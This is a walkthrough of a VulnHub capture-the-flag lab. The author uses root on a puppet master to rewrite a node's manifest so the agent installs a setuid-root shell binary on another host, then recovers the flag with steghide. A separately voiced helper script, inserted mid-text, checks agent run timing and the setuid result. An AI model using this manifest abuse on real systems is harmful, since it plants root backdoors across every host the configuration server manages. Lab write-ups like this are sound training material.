[Vulnhub] analoguepond - Walkthrough Part 3

Hi, guys.
Ok, now I'm on the third host: nleeson@barringsbank:~$

I found this 'lovely' file again in the home dir: reticulatingsplines.gif. Remember that I got a .gif with the same name in part 1? This one is also nothing special.

Then I tried netstat: nothing apart from ssh. Looked at uname: at least not obviously vulnerable. Searched for suid and sgid files: nothing interesting. Navigated to /etc? Oh, I saw the familiar puppet folder, but there is nothing interesting inside.

Then, after taking a look at Fabian's walkthrough, I finally knew what to do.

These two hosts form a puppet setup: the puppet master serves manifests and files, and the agent on each node applies them as root, so whatever content, owner and mode a file resource declares lands on the agent's filesystem with root's authority. So now that I have root on the puppet master, I can declare a setuid-root file, like the spin binary from part 2, and have the agent on nleeson's host write it for me.

I don't need to copy the spin file from 192.168.122.2 to .3 myself; I just need to change the target node's manifest in the puppet configuration on the master, and the agent fetches it on its next run.

I noticed this earlier on 192.168.122.2:

sandieshaw@puppet:/etc/puppet/manifests$ cat site.pp 
node 'default' {
  include vulnhub
  }

node 'puppet.example.com' inherits 'default' {
  include wiggle
  }

node 'barringsbank.example.com' inherits 'default' {
  include fiveeights
  }

I don't know the details of what this means, but I think that since I used wiggle to synchronize files on puppet, I should use fiveeights for barringsbank. Also, the init.pp inside fiveeights supports my idea, because the authorized_keys it declares exactly matches the file on the barringsbank host.

sandieshaw@puppet:/etc/puppet/modules/fiveeights/manifests$ cat init.pp
## Nick's secret file hide the screw-ups
class fiveeights {

## private key held elsewhere. Keep looking
  file { '/home/nleeson/.ssh/authorized_keys':
  content => "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCTPnm+I5zEPNUHc1PgmsIxK8XCvtRECY6nTFOdNL3CxVBepWLv0wgPWBIUAkP9nfPUshXo1EIjcvb0+RGtJ8KNbVK4vW2ZCwgNicUoYnCcVtSrGtz9oAnKpeGcCKAuHG6ybt4Opxe75eF4dZt2/aDRrPMw8PK8l8a3o9ZdJlIgdLiWORPiga/zUu1zuySkQPFHzPBp29MvWVwAYsssEjcXINfuvysPbdBzMJaJ2o4jmFV9g/uCz3xjRi9zULP1VpoRYtZUQadU2CpuN1RtVDeoSeYVe6vYkeLz6rCBQTUfi9Nea4X1JtvaTfnrquRMWOr43WnMMcdFpIsBd8oCI4jH root@puppet",
  }
}

Now modify init.pp so it delivers spin to barringsbank instead:

sandieshaw@puppet:/etc/puppet/modules/fiveeights/manifests$ cat init.pp
class fiveeights {
  # Applied by the agent on barringsbank as root: the file is written with
  # the owner, group and setuid mode declared here.
  file { '/tmp/spin':
    ensure => present,
    mode   => '4755',   # setuid root (quoted: Puppet expects the mode as a string)
    owner  => 'root',
    group  => 'root',
    # served by the master from modules/wiggle/files/spin, left over from part 2
    source => 'puppet:///modules/wiggle/spin',
  }
}

I waited a couple of minutes for the agent's next run, executed it, and there we go.

nleeson@barringsbank:~$ /tmp/spin 
# whoami
root
# id
uid=1000(nleeson) gid=1000(nleeson) euid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),110(lpadmin),111(sambashare),1000(nleeson)
# cd /root
# ls -la
total 236
drwx------  3 root    root      4096 Jan  7  2017 .
drwxr-xr-x 22 root    root      4096 Jan  7  2017 ..
-rw-r--r--  1 root    root      3106 Feb 20  2014 .bashrc
-rw-rw-r--  1 nleeson nleeson 220099 Dec 21  2016 me.jpeg
-rw-r--r--  1 root    root       140 Feb 20  2014 .profile
drwx------  2 root    root      4096 Dec 18  2016 .ssh
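Two checks a practitioner would want around the "wait a couple of minutes" step, as an added example (my own shell, not code from the original walkthrough or from the VMs): working out when the agent's next run is due from its runinterval and the last_run timestamp in last_run_summary.yaml, and confirming that the delivered file really landed as setuid root before relying on it. The Puppet 3 paths /etc/puppet/puppet.conf and /var/lib/puppet/state/last_run_summary.yaml are assumptions (the summary file is normally only readable by root, so on the target this check is only useful once you have the shell from spin); the sample config and summary in the comments are constructed.

```shell
#!/bin/sh
# Added example, not from the original walkthrough. Assumed paths (Puppet 3 era):
#   /etc/puppet/puppet.conf                      (agent settings)
#   /var/lib/puppet/state/last_run_summary.yaml  (written after each agent run)

# puppet_runinterval CONF -> prints the agent run interval in seconds.
# Accepts the plain-seconds form and the s/m/h/d suffixes Puppet allows;
# defaults to 1800 (Puppet's default of 30 minutes) when unset.
puppet_runinterval() {
    ri=$(sed -n 's/^[[:space:]]*runinterval[[:space:]]*=[[:space:]]*\([0-9]*[smhd]\{0,1\}\).*/\1/p' "$1" | tail -n 1)
    case "$ri" in
        '') ri=1800 ;;
        *s) ri=${ri%s} ;;
        *m) ri=$(( ${ri%m} * 60 )) ;;
        *h) ri=$(( ${ri%h} * 3600 )) ;;
        *d) ri=$(( ${ri%d} * 86400 )) ;;
    esac
    printf '%s\n' "$ri"
}

# puppet_last_run SUMMARY -> epoch of the last completed agent run, taken from
# the "last_run:" key under "time:" in last_run_summary.yaml.
puppet_last_run() {
    sed -n 's/^[[:space:]]*last_run:[[:space:]]*\([0-9]*\).*/\1/p' "$1" | tail -n 1
}

# puppet_next_run CONF SUMMARY -> epoch at which the next run is expected.
puppet_next_run() {
    ri=$(puppet_runinterval "$1")
    lr=$(puppet_last_run "$2")
    [ -n "$lr" ] || { echo "no last_run in $2" >&2; return 1; }
    echo $(( lr + ri ))
}

# seconds_until EPOCH -> seconds left before EPOCH, or 0 if it has passed.
seconds_until() {
    d=$(( $1 - $(date +%s) ))
    [ "$d" -gt 0 ] && echo "$d" || echo 0
}

# is_suid_root "MODE OWNER" -> succeeds only for a 4755 root-owned file.
# Feed it the output of: stat -c '%a %U' /tmp/spin
is_suid_root() {
    [ "$1" = "4755 root" ]
}

# Usage on the target (paths assumed as above):
#   next=$(puppet_next_run /etc/puppet/puppet.conf /var/lib/puppet/state/last_run_summary.yaml)
#   echo "next agent run in $(seconds_until "$next") s"
#   is_suid_root "$(stat -c '%a %U' /tmp/spin)" && echo "spin is setuid root"
#
# Constructed sample input used for the checks below:
#   puppet.conf:               [agent]\nruninterval = 2m
#   last_run_summary.yaml:     time:\n    last_run: 1483800100
```

The mode/owner check matters because a file resource that fails halfway (for example, the source missing on the master) can leave /tmp/spin absent or with a different owner, and a non-root-owned setuid binary gives you nothing.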

Ok, me.jpeg, it should be you.

Tunnel me.jpeg out to my Kali box and check it with steghide:

root@kali:~/vulnerhub/analoguepond# steghide --info me.jpeg 
"me.jpeg":
  format: jpeg
  capacity: 11.9 KB
Try to get information about embedded data ? (y/n) 
Enter passphrase: 
  embedded file "primate_egyptian_flag.txt":
    size: 3.7 KB
    encrypted: rijndael-128, cbc
    compressed: yes

It asked for a passphrase. I don't think I have anything left except those two reticulatingsplines.gif files, so I provided 'reticulatingsplines', and it passed!

Now extract the file from it.

root@kali:~/vulnerhub/analoguepond# steghide extract -sf me.jpeg -p reticulatingsplines

I got primate_egyptian_flag.txt.

Cooked it the same way as before (hex to bytes, reversed, then base64-decoded):

root@kali:~/vulnerhub/analoguepond# xxd -r -p primate_egyptian_flag.txt | rev | base64 --decode 

Here's a fender bass for you...

                                  ,-.        _.---._
                                |  `\.__.-''       `.
                                 \  _        _  ,.   \
           ,+++=._________________)_||______|_|_||    |
          (_.ooo.===================||======|=|=||    |
             ~~'                 |  ~'      `~' o o  /
                                  \   /~`\     o o  /
                                   `~'    `-.____.-' 


Congratulations to you once again and for the sixth time on capturing this
flag! 

I've tried to mix things up a bit here, to move away from throw metasploit
and web exploits at things. I hope you have enjoyed that portion and your
feedback on this aspect would be appreciated.

Of note, these VMs are set to do automatic security updates using puppet,
so this ought to keep things dynamic enough for people.

Many thanks to mrB3n, Rand0mByteZ and kevinnz for testing this CTF.

A special thank you to g0tmi1k for hosting all these challenges and the
valuable advice. A tip of the hat to mrb3n for his recent assistance. Hit
me on IRC or twitter if you are looking for a hint or have completed the
challenge.

Go on, Complete the circle: 06:30 to 07:45 of episode #1 of Our Friends In The North (C) BBC 1995.. What's the connection....?
                                                           --Knightmare

Sweet! Finally! Got the flag! :D

Thank you, dude; this is a good box, and I learned many things.

As for the last hint, I've watched the video and found nothing special. I don't know what 'complete the circle' means. I also don't know why he says 'what's the connection....?'

But anyway, I assume this is the end of it. If anyone knows about this or has any suggestion, please leave a comment.

That's it. Thank you very much!

Cheers!